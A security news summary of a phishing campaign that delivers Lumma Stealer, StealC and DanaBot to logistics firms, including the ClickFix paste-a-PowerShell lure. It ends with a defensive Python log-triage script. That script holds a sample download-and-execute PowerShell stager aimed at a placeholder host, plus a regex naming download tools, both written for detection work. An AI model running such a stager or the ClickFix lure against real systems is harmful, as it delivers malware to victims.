Researchers are tracking a concerning malware campaign targeting transportation and logistics companies across North America. The threat actors behind the campaign use compromised legitimate email accounts to inject malicious content into ongoing email conversations, making the attacks appear more credible.
This campaign, which has been active since May 2024, involves a variety of malware payloads, including Lumma Stealer, StealC, and DanaBot. In recent months, the attackers have adapted their methods, employing new infrastructure and techniques such as “ClickFix” to deliver malware via Base64-encoded PowerShell scripts.
At this time, it remains unclear to researchers how the attackers gained initial access to the compromised email accounts.
The attackers impersonate industry-specific software such as Samsara and Astra TMS, crafting phishing emails that mimic the language and workflows common in the shipping and logistics sector. This suggests they research their targets thoroughly before launching a campaign, significantly increasing the chances of a successful breach.
Why It Matters: Cybercriminals are refining their social engineering tactics to blend malicious activity seamlessly into real email conversations, increasing the risk of malware infection. By targeting transportation and logistics companies and impersonating specialized software, this campaign showcases a strategic focus on sectors crucial to supply chains and critical infrastructure. Organizations in these industries need to remain vigilant to avoid falling victim to increasingly sophisticated phishing tactics.
- Compromised Legitimate Accounts: The threat actors use compromised email accounts from transportation companies, injecting malicious content into existing conversations, making it harder for victims to detect the threat.
- Variety of Malware: From May to July 2024, the campaign delivered Lumma Stealer, StealC, and DanaBot. In August 2024, the attackers introduced the “ClickFix” technique, in which victims are led through dialog boxes to copy and paste a PowerShell script that downloads malware.
- Targeted Sector: The campaign focuses on North American transport and logistics companies, impersonating software like Samsara and Astra TMS, which are commonly used in fleet management.
- Financially Motivated: Researchers assess that these attacks are likely financially driven, though the actors remain unidentified. The use of commodity malware like DanaBot and third-party infrastructure points to involvement in the broader cybercriminal ecosystem, relying on widely available tools rather than custom malware.
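As an added defender-side illustration (not code from the original report), the Python below triages constructed Sysmon-style process-creation lines for the ClickFix pattern described above: a PowerShell launch carrying a Base64-encoded (UTF-16LE) command that, once decoded, contains a download cmdlet. The log line format, the explorer.exe parent (assumed to be the launch path when a user pastes into the Run dialog), the placeholder host and the sample scripts are all constructed assumptions.

```python
import base64
import re

# Constructed samples (not real telemetry). Encoded payloads are built here
# so the example runs offline; PowerShell's -EncodedCommand takes base64 of
# the UTF-16LE script text.
def encode_ps(script: str) -> str:
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

ADMIN_SCRIPT = "Get-Process | Where-Object { $_.CPU -gt 100 }"
# Hypothetical stager shape: fetch a file, then run it (placeholder host)
STAGER_SCRIPT = ("Invoke-WebRequest 'http://placeholder.invalid/f.exe' -OutFile $env:TEMP\\f.exe; "
                 "Start-Process $env:TEMP\\f.exe")

SAMPLE_LOGS = [
    "ParentImage=C:\\Windows\\explorer.exe Image=powershell.exe CommandLine=powershell.exe -NoProfile Get-Date",
    "ParentImage=C:\\Windows\\explorer.exe Image=powershell.exe CommandLine=powershell.exe -nop -w hidden -enc " + encode_ps(STAGER_SCRIPT),
    "ParentImage=C:\\Windows\\System32\\cmd.exe Image=powershell.exe CommandLine=powershell.exe -EncodedCommand " + encode_ps(ADMIN_SCRIPT),
]

DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b", re.I)

def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line uses an -EncodedCommand
    switch (PowerShell accepts any prefix of it, e.g. -e, -ec, -enc)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if len(t) >= 2 and "-encodedcommand".startswith(t):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def triage(line: str) -> dict:
    """Score one process-creation line for ClickFix-style indicators."""
    m = re.match(r"ParentImage=(\S+) Image=(\S+) CommandLine=(.*)$", line)
    parent, cmd = m.group(1), m.group(3)
    decoded = decode_encoded_command(cmd)
    reasons = []
    if decoded is not None:
        reasons.append("encoded_command")
    if re.search(r"-w(indowstyle)?\s+hidden", cmd, re.I):
        reasons.append("hidden_window")
    if parent.lower().endswith("explorer.exe"):  # Run-dialog / shell paste launch path
        reasons.append("parent_explorer")
    if DOWNLOAD_RE.search(decoded or cmd):
        reasons.append("download_cmdlet")
    return {"decoded": decoded, "reasons": reasons, "alert": len(reasons) >= 3}

def scan(lines):
    """Return the triage records that cross the alert threshold."""
    return [t for t in map(triage, lines) if t["alert"]]
```

The admin line decodes but scores only one indicator, so it stays below the alert threshold; the decoded script is kept in the record so an analyst can review it rather than the opaque Base64 blob.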